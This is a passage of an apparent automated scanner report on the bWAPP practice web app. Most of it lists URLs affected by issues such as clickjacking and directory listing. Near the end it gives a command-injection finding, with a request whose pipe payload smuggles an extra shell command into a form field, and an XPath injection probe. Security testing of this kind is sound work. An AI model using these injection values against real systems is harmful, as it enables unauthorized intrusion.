28.336. http://192.168.52.147/bWAPP/sqli_16.php [name of an arbitrarily supplied URL parameter]

28.337. http://192.168.52.147/bWAPP/sqli_17.php [URL path filename]

28.338. http://192.168.52.147/bWAPP/sqli_17.php [name of an arbitrarily supplied URL parameter]

28.339. http://192.168.52.147/bWAPP/sqli_2.php [URL path filename]

28.340. http://192.168.52.147/bWAPP/sqli_2.php [name of an arbitrarily supplied URL parameter]

28.341. http://192.168.52.147/bWAPP/sqli_3.php [URL path filename]

28.342. http://192.168.52.147/bWAPP/sqli_3.php [name of an arbitrarily supplied URL parameter]

28.343. http://192.168.52.147/bWAPP/sqli_4.php [URL path filename]

28.344. http://192.168.52.147/bWAPP/sqli_4.php [name of an arbitrarily supplied URL parameter]

28.345. http://192.168.52.147/bWAPP/sqli_5.php [URL path filename]

28.346. http://192.168.52.147/bWAPP/sqli_5.php [name of an arbitrarily supplied URL parameter]

28.347. http://192.168.52.147/bWAPP/sqli_6.php [URL path filename]

28.348. http://192.168.52.147/bWAPP/sqli_6.php [name of an arbitrarily supplied URL parameter]

28.349. http://192.168.52.147/bWAPP/sqli_7.php [URL path filename]

28.350. http://192.168.52.147/bWAPP/sqli_7.php [name of an arbitrarily supplied URL parameter]

28.351. http://192.168.52.147/bWAPP/sqli_8-1.php [URL path filename]

28.352. http://192.168.52.147/bWAPP/sqli_8-1.php [name of an arbitrarily supplied URL parameter]

28.353. http://192.168.52.147/bWAPP/sqli_9.php [URL path filename]

28.354. http://192.168.52.147/bWAPP/sqli_9.php [name of an arbitrarily supplied URL parameter]

28.355. http://192.168.52.147/bWAPP/sqli_drupal.php [URL path filename]

28.356. http://192.168.52.147/bWAPP/sqli_drupal.php [name of an arbitrarily supplied URL parameter]

28.357. http://192.168.52.147/bWAPP/ssii.php [URL path filename]

28.358. http://192.168.52.147/bWAPP/ssii.php [name of an arbitrarily supplied URL parameter]

28.359. http://192.168.52.147/bWAPP/ssii.shtml [URL path filename]

28.360. http://192.168.52.147/bWAPP/ssrf.php [URL path filename]

28.361. http://192.168.52.147/bWAPP/ssrf.php [name of an arbitrarily supplied URL parameter]

28.362. http://192.168.52.147/bWAPP/top_security.php [URL path filename]

28.363. http://192.168.52.147/bWAPP/top_security.php [name of an arbitrarily supplied URL parameter]

28.364. http://192.168.52.147/bWAPP/unrestricted_file_upload.php [URL path filename]

28.365. http://192.168.52.147/bWAPP/unrestricted_file_upload.php [name of an arbitrarily supplied URL parameter]

28.366. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php [URL path filename]

28.367. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php [name of an arbitrarily supplied URL parameter]

28.368. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php [URL path filename]

28.369. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php [name of an arbitrarily supplied URL parameter]

28.370. http://192.168.52.147/bWAPP/user_extra.php [URL path filename]

28.371. http://192.168.52.147/bWAPP/user_extra.php [name of an arbitrarily supplied URL parameter]

28.372. http://192.168.52.147/bWAPP/user_new.php [URL path filename]

28.373. http://192.168.52.147/bWAPP/user_new.php [name of an arbitrarily supplied URL parameter]

28.374. http://192.168.52.147/bWAPP/ws_soap.php [URL path filename]

28.375. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]

28.376. http://192.168.52.147/bWAPP/xmli_1.php [URL path filename]

28.377. http://192.168.52.147/bWAPP/xmli_1.php [name of an arbitrarily supplied URL parameter]

28.378. http://192.168.52.147/bWAPP/xmli_2.php [URL path filename]

28.379. http://192.168.52.147/bWAPP/xmli_2.php [name of an arbitrarily supplied URL parameter]

28.380. http://192.168.52.147/bWAPP/xss_ajax_1-1.php [URL path filename]

28.381. http://192.168.52.147/bWAPP/xss_ajax_1-1.php [name of an arbitrarily supplied URL parameter]

28.382. http://192.168.52.147/bWAPP/xss_ajax_2-1.php [URL path filename]

28.383. http://192.168.52.147/bWAPP/xss_ajax_2-1.php [name of an arbitrarily supplied URL parameter]

28.384. http://192.168.52.147/bWAPP/xss_back_button.php [URL path filename]

28.385. http://192.168.52.147/bWAPP/xss_back_button.php [name of an arbitrarily supplied URL parameter]

28.386. http://192.168.52.147/bWAPP/xss_custom_header.php [URL path filename]

28.387. http://192.168.52.147/bWAPP/xss_custom_header.php [name of an arbitrarily supplied URL parameter]

28.388. http://192.168.52.147/bWAPP/xss_eval.php [URL path filename]

28.389. http://192.168.52.147/bWAPP/xss_eval.php [name of an arbitrarily supplied URL parameter]

28.390. http://192.168.52.147/bWAPP/xss_get.php [URL path filename]

28.391. http://192.168.52.147/bWAPP/xss_get.php [name of an arbitrarily supplied URL parameter]

28.392. http://192.168.52.147/bWAPP/xss_href-1.php [URL path filename]

28.393. http://192.168.52.147/bWAPP/xss_href-1.php [name of an arbitrarily supplied URL parameter]

28.394. http://192.168.52.147/bWAPP/xss_href-2.php [URL path filename]

28.395. http://192.168.52.147/bWAPP/xss_href-2.php [name of an arbitrarily supplied URL parameter]

28.396. http://192.168.52.147/bWAPP/xss_href-3.php [URL path filename]

28.397. http://192.168.52.147/bWAPP/xss_href-3.php [name of an arbitrarily supplied URL parameter]

28.398. http://192.168.52.147/bWAPP/xss_json.php [URL path filename]

28.399. http://192.168.52.147/bWAPP/xss_json.php [name of an arbitrarily supplied URL parameter]

28.400. http://192.168.52.147/bWAPP/xss_login.php [URL path filename]

28.401. http://192.168.52.147/bWAPP/xss_login.php [name of an arbitrarily supplied URL parameter]

28.402. http://192.168.52.147/bWAPP/xss_php_self.php [URL path filename]

28.403. http://192.168.52.147/bWAPP/xss_php_self.php [name of an arbitrarily supplied URL parameter]

28.404. http://192.168.52.147/bWAPP/xss_phpmyadmin.php [URL path filename]

28.405. http://192.168.52.147/bWAPP/xss_phpmyadmin.php [name of an arbitrarily supplied URL parameter]

28.406. http://192.168.52.147/bWAPP/xss_post.php [URL path filename]

28.407. http://192.168.52.147/bWAPP/xss_post.php [name of an arbitrarily supplied URL parameter]

28.408. http://192.168.52.147/bWAPP/xss_referer.php [URL path filename]

28.409. http://192.168.52.147/bWAPP/xss_referer.php [name of an arbitrarily supplied URL parameter]

28.410. http://192.168.52.147/bWAPP/xss_sqlitemanager.php [URL path filename]

28.411. http://192.168.52.147/bWAPP/xss_sqlitemanager.php [name of an arbitrarily supplied URL parameter]

28.412. http://192.168.52.147/bWAPP/xss_stored_1.php [URL path filename]

28.413. http://192.168.52.147/bWAPP/xss_stored_1.php [name of an arbitrarily supplied URL parameter]

28.414. http://192.168.52.147/bWAPP/xss_stored_2.php [URL path filename]

28.415. http://192.168.52.147/bWAPP/xss_stored_2.php [name of an arbitrarily supplied URL parameter]

28.416. http://192.168.52.147/bWAPP/xss_stored_3.php [URL path filename]

28.417. http://192.168.52.147/bWAPP/xss_stored_3.php [name of an arbitrarily supplied URL parameter]

28.418. http://192.168.52.147/bWAPP/xss_stored_4.php [URL path filename]

28.419. http://192.168.52.147/bWAPP/xss_stored_4.php [name of an arbitrarily supplied URL parameter]

28.420. http://192.168.52.147/bWAPP/xss_user_agent.php [URL path filename]

28.421. http://192.168.52.147/bWAPP/xss_user_agent.php [name of an arbitrarily supplied URL parameter]

28.422. http://192.168.52.147/bWAPP/xxe-1.php [URL path filename]

28.423. http://192.168.52.147/bWAPP/xxe-1.php [name of an arbitrarily supplied URL parameter]

29. Suspicious input transformation (reflected)

30. Cross-domain Referer leakage

30.1. http://192.168.52.147/bWAPP/admin/phpinfo.php

30.2. http://192.168.52.147/bWAPP/admin/phpinfo.php/

30.3. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

30.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

30.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

30.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

30.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

30.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

30.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

30.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

30.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

30.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

30.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

30.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

30.15. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

30.16. http://192.168.52.147/bWAPP/csrf_2.php

30.17. http://192.168.52.147/bWAPP/directory_traversal_1.php

30.18. http://192.168.52.147/bWAPP/directory_traversal_2.php

30.19. http://192.168.52.147/bWAPP/hpp-2.php

30.20. http://192.168.52.147/bWAPP/hpp-3.php

30.21. http://192.168.52.147/bWAPP/htmli_get.php

30.22. http://192.168.52.147/bWAPP/iframei.php

30.23. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

30.24. http://192.168.52.147/bWAPP/ldap_connect.php

30.25. http://192.168.52.147/bWAPP/phpi.php

30.26. http://192.168.52.147/bWAPP/rlfi.php

30.27. http://192.168.52.147/bWAPP/smgmt_admin_portal.php

30.28. http://192.168.52.147/bWAPP/sqli_1.php

30.29. http://192.168.52.147/bWAPP/sqli_10-1.php

30.30. http://192.168.52.147/bWAPP/sqli_11.php

30.31. http://192.168.52.147/bWAPP/sqli_14.php

30.32. http://192.168.52.147/bWAPP/sqli_15.php

30.33. http://192.168.52.147/bWAPP/sqli_2.php

30.34. http://192.168.52.147/bWAPP/sqli_4.php

30.35. http://192.168.52.147/bWAPP/sqli_5.php

30.36. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php

30.37. http://192.168.52.147/bWAPP/xmli_1.php

30.38. http://192.168.52.147/bWAPP/xmli_2.php

30.39. http://192.168.52.147/bWAPP/xss_eval.php

30.40. http://192.168.52.147/bWAPP/xss_get.php

30.41. http://192.168.52.147/bWAPP/xss_href-2.php

30.42. http://192.168.52.147/bWAPP/xss_href-3.php

30.43. http://192.168.52.147/bWAPP/xss_json.php

30.44. http://192.168.52.147/bWAPP/xss_php_self.php

30.45. http://192.168.52.147/bWAPP/xss_stored_2.php

31. File upload functionality

32. Frameable response (potential Clickjacking)

32.1. http://192.168.52.147/bWAPP/admin/

32.2. http://192.168.52.147/bWAPP/admin/index.php

32.3. http://192.168.52.147/bWAPP/admin/phpinfo.php

32.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/

32.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

32.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

32.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

32.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

32.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

32.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

32.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

32.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

32.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

32.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

32.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

32.16. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

32.17. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

32.18. http://192.168.52.147/bWAPP/aim.php

32.19. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

32.20. http://192.168.52.147/bWAPP/ba_forgotten.php

32.21. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

32.22. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

32.23. http://192.168.52.147/bWAPP/ba_weak_pwd.php

32.24. http://192.168.52.147/bWAPP/bof_1.php

32.25. http://192.168.52.147/bWAPP/bof_2.php

32.26. http://192.168.52.147/bWAPP/captcha_box.php

32.27. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh

32.28. http://192.168.52.147/bWAPP/clickjacking.php

32.29. http://192.168.52.147/bWAPP/commandi.php

32.30. http://192.168.52.147/bWAPP/commandi_blind.php

32.31. http://192.168.52.147/bWAPP/csrf_2.php

32.32. http://192.168.52.147/bWAPP/csrf_3.php

32.33. http://192.168.52.147/bWAPP/directory_traversal_1.php

32.34. http://192.168.52.147/bWAPP/directory_traversal_2.php

32.35. http://192.168.52.147/bWAPP/fonts/

32.36. http://192.168.52.147/bWAPP/heartbleed.php

32.37. http://192.168.52.147/bWAPP/hostheader_1.php

32.38. http://192.168.52.147/bWAPP/hostheader_2.php

32.39. http://192.168.52.147/bWAPP/hpp-1.php

32.40. http://192.168.52.147/bWAPP/hpp-2.php

32.41. http://192.168.52.147/bWAPP/hpp-3.php

32.42. http://192.168.52.147/bWAPP/htmli_current_url.php

32.43. http://192.168.52.147/bWAPP/htmli_get.php

32.44. http://192.168.52.147/bWAPP/htmli_post.php

32.45. http://192.168.52.147/bWAPP/htmli_stored.php

32.46. http://192.168.52.147/bWAPP/http_response_splitting.php

32.47. http://192.168.52.147/bWAPP/http_verb_tampering.php

32.48. http://192.168.52.147/bWAPP/iframei.php

32.49. http://192.168.52.147/bWAPP/images/

32.50. http://192.168.52.147/bWAPP/info.php

32.51. http://192.168.52.147/bWAPP/information_disclosure_1.php

32.52. http://192.168.52.147/bWAPP/information_disclosure_2.php

32.53. http://192.168.52.147/bWAPP/information_disclosure_3.php

32.54. http://192.168.52.147/bWAPP/information_disclosure_4.php

32.55. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php

32.56. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

32.57. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

32.58. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php

32.59. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php

32.60. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php

32.61. http://192.168.52.147/bWAPP/insecure_iframe.php

32.62. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

32.63. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php

32.64. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_3.php

32.65. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_4.php

32.66. http://192.168.52.147/bWAPP/js/

32.67. http://192.168.52.147/bWAPP/ldap_connect.php

32.68. http://192.168.52.147/bWAPP/lfi_sqlitemanager.php

32.69. http://192.168.52.147/bWAPP/login.php

32.70. http://192.168.52.147/bWAPP/logs/

32.71. http://192.168.52.147/bWAPP/maili.php

32.72. http://192.168.52.147/bWAPP/manual_interv.php

32.73. http://192.168.52.147/bWAPP/password_change.php

32.74. http://192.168.52.147/bWAPP/passwords/

32.75. http://192.168.52.147/bWAPP/php_cgi.php

32.76. http://192.168.52.147/bWAPP/php_eval.php

32.77. http://192.168.52.147/bWAPP/phpi.php

32.78. http://192.168.52.147/bWAPP/phpi_sqlitemanager.php

32.79. http://192.168.52.147/bWAPP/portal.php

32.80. http://192.168.52.147/bWAPP/restrict_device_access.php

32.81. http://192.168.52.147/bWAPP/restrict_folder_access.php

32.82. http://192.168.52.147/bWAPP/rlfi.php

32.83. http://192.168.52.147/bWAPP/secret_html.php

32.84. http://192.168.52.147/bWAPP/security_level_set.php

32.85. http://192.168.52.147/bWAPP/shellshock.php

32.86. http://192.168.52.147/bWAPP/sm_cors.php

32.87. http://192.168.52.147/bWAPP/sm_cross_domain_policy.php

32.88. http://192.168.52.147/bWAPP/sm_dos_1.php

32.89. http://192.168.52.147/bWAPP/sm_dos_3.php

32.90. http://192.168.52.147/bWAPP/sm_dos_4.php

32.91. http://192.168.52.147/bWAPP/sm_ftp.php

32.92. http://192.168.52.147/bWAPP/sm_local_priv_esc_1.php

32.93. http://192.168.52.147/bWAPP/sm_local_priv_esc_2.php

32.94. http://192.168.52.147/bWAPP/sm_mitm_1.php

32.95. http://192.168.52.147/bWAPP/sm_mitm_2.php

32.96. http://192.168.52.147/bWAPP/sm_robots.php

32.97. http://192.168.52.147/bWAPP/sm_samba.php

32.98. http://192.168.52.147/bWAPP/sm_snmp.php

32.99. http://192.168.52.147/bWAPP/sm_webdav.php

32.100. http://192.168.52.147/bWAPP/sm_xst.php

32.101. http://192.168.52.147/bWAPP/smgmt_admin_portal.php

32.102. http://192.168.52.147/bWAPP/smgmt_cookies_httponly.php

32.103. http://192.168.52.147/bWAPP/smgmt_cookies_secure.php

32.104. http://192.168.52.147/bWAPP/smgmt_sessionid_url.php

32.105. http://192.168.52.147/bWAPP/smgmt_strong_sessions.php

32.106. http://192.168.52.147/bWAPP/sqli_1.php

32.107. http://192.168.52.147/bWAPP/sqli_10-1.php

32.108. http://192.168.52.147/bWAPP/sqli_11.php

32.109. http://192.168.52.147/bWAPP/sqli_12.php

32.110. http://192.168.52.147/bWAPP/sqli_13.php

32.111. http://192.168.52.147/bWAPP/sqli_14.php

32.112. http://192.168.52.147/bWAPP/sqli_15.php

32.113. http://192.168.52.147/bWAPP/sqli_16.php

32.114. http://192.168.52.147/bWAPP/sqli_17.php

32.115. http://192.168.52.147/bWAPP/sqli_2.php

32.116. http://192.168.52.147/bWAPP/sqli_3.php

32.117. http://192.168.52.147/bWAPP/sqli_4.php

32.118. http://192.168.52.147/bWAPP/sqli_5.php

32.119. http://192.168.52.147/bWAPP/sqli_6.php

32.120. http://192.168.52.147/bWAPP/sqli_7.php

32.121. http://192.168.52.147/bWAPP/sqli_8-1.php

32.122. http://192.168.52.147/bWAPP/sqli_9.php

32.123. http://192.168.52.147/bWAPP/sqli_drupal.php

32.124. http://192.168.52.147/bWAPP/ssii.php

32.125. http://192.168.52.147/bWAPP/ssrf.php

32.126. http://192.168.52.147/bWAPP/stylesheets/

32.127. http://192.168.52.147/bWAPP/top_security.php

32.128. http://192.168.52.147/bWAPP/training.php

32.129. http://192.168.52.147/bWAPP/unrestricted_file_upload.php

32.130. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php

32.131. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php

32.132. http://192.168.52.147/bWAPP/user_extra.php

32.133. http://192.168.52.147/bWAPP/user_new.php

32.134. http://192.168.52.147/bWAPP/ws_soap.php

32.135. http://192.168.52.147/bWAPP/xmli_1.php

32.136. http://192.168.52.147/bWAPP/xmli_2.php

32.137. http://192.168.52.147/bWAPP/xss_ajax_1-1.php

32.138. http://192.168.52.147/bWAPP/xss_ajax_2-1.php

32.139. http://192.168.52.147/bWAPP/xss_back_button.php

32.140. http://192.168.52.147/bWAPP/xss_custom_header.php

32.141. http://192.168.52.147/bWAPP/xss_eval.php

32.142. http://192.168.52.147/bWAPP/xss_get.php

32.143. http://192.168.52.147/bWAPP/xss_href-1.php

32.144. http://192.168.52.147/bWAPP/xss_href-2.php

32.145. http://192.168.52.147/bWAPP/xss_href-3.php

32.146. http://192.168.52.147/bWAPP/xss_json.php

32.147. http://192.168.52.147/bWAPP/xss_login.php

32.148. http://192.168.52.147/bWAPP/xss_php_self.php

32.149. http://192.168.52.147/bWAPP/xss_phpmyadmin.php

32.150. http://192.168.52.147/bWAPP/xss_post.php

32.151. http://192.168.52.147/bWAPP/xss_referer.php

32.152. http://192.168.52.147/bWAPP/xss_sqlitemanager.php

32.153. http://192.168.52.147/bWAPP/xss_stored_1.php

32.154. http://192.168.52.147/bWAPP/xss_stored_2.php

32.155. http://192.168.52.147/bWAPP/xss_stored_3.php

32.156. http://192.168.52.147/bWAPP/xss_stored_4.php

32.157. http://192.168.52.147/bWAPP/xss_user_agent.php

32.158. http://192.168.52.147/bWAPP/xxe-1.php

33. Link manipulation (reflected)

34. Directory listing

34.1. http://192.168.52.147/bWAPP/fonts/

34.2. http://192.168.52.147/bWAPP/images/

34.3. http://192.168.52.147/bWAPP/js/

34.4. http://192.168.52.147/bWAPP/logs/

34.5. http://192.168.52.147/bWAPP/passwords/

34.6. http://192.168.52.147/bWAPP/stylesheets/

35. Private IP addresses disclosed

35.1. http://192.168.52.147/bWAPP/admin/phpinfo.php

35.2. http://192.168.52.147/bWAPP/admin/phpinfo.php/

35.3. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

35.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

35.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

35.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

35.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

35.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

35.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

35.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

35.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

35.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

35.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

35.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

35.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

35.16. http://192.168.52.147/bWAPP/aim.php

35.17. http://192.168.52.147/bWAPP/commandi.php

35.18. http://192.168.52.147/bWAPP/logs/visitors.txt

35.19. http://192.168.52.147/bWAPP/sqli_17.php

35.20. http://192.168.52.147/bWAPP/ssii.shtml

35.21. http://192.168.52.147/bWAPP/xss_stored_4.php

36. HTML does not specify charset

36.1. http://192.168.52.147/bWAPP/admin/phpinfo.php

36.2. http://192.168.52.147/bWAPP/admin/phpinfo.php/

36.3. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

36.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

36.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

36.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

36.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

36.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

36.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

36.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

36.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

36.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

36.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

36.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

36.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

36.16. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh

36.17. http://192.168.52.147/bWAPP/ssii.shtml

36.18. http://192.168.52.147/bWAPP/ws_soap.php

37. [Vulners] Software detected

37.1. http://192.168.52.147/bWAPP/clickjacking.php

37.2. http://192.168.52.147/bWAPP/clickjacking.php

37.3. http://192.168.52.147/bWAPP/clickjacking.php

37.4. http://192.168.52.147/bWAPP/commandi.php

37.5. http://192.168.52.147/bWAPP/commandi.php

37.6. http://192.168.52.147/bWAPP/commandi.php

37.7. http://192.168.52.147/bWAPP/commandi.php

37.8. http://192.168.52.147/bWAPP/xss_eval.php


1. OS command injection
Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The target parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands and retrieve the output in the application's responses.

The payload |echo 8v6rl9owbr yc6oeo2h54||a #' |echo 8v6rl9owbr yc6oeo2h54||a #|" |echo 8v6rl9owbr yc6oeo2h54||a # was submitted in the target parameter. The application's response appears to contain the output from the injected command, indicating that the command was executed.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.

Vulnerability classifications

Request

POST /bWAPP/commandi.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/commandi.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 30
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
Connection: close

target=www.nsa.gov%7cecho%208v6rl9owbr%20yc6oeo2h54%7c%7ca%20%23'%20%7cecho%208v6rl9owbr%20yc6oeo2h54%7c%7ca%20%23%7c%22%20%7cecho%208v6rl9owbr%20yc6oeo2h54%7c%7ca%20%23&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 04:04:40 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12969

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<p align="left">8v6rl9owbr yc6oeo2h54
</p>
...[SNIP]...
2. XPath injection
Previous  Next

There are 152 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Vulnerability classifications



2.1. http://192.168.52.147/bWAPP/ [Referer HTTP header]
Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

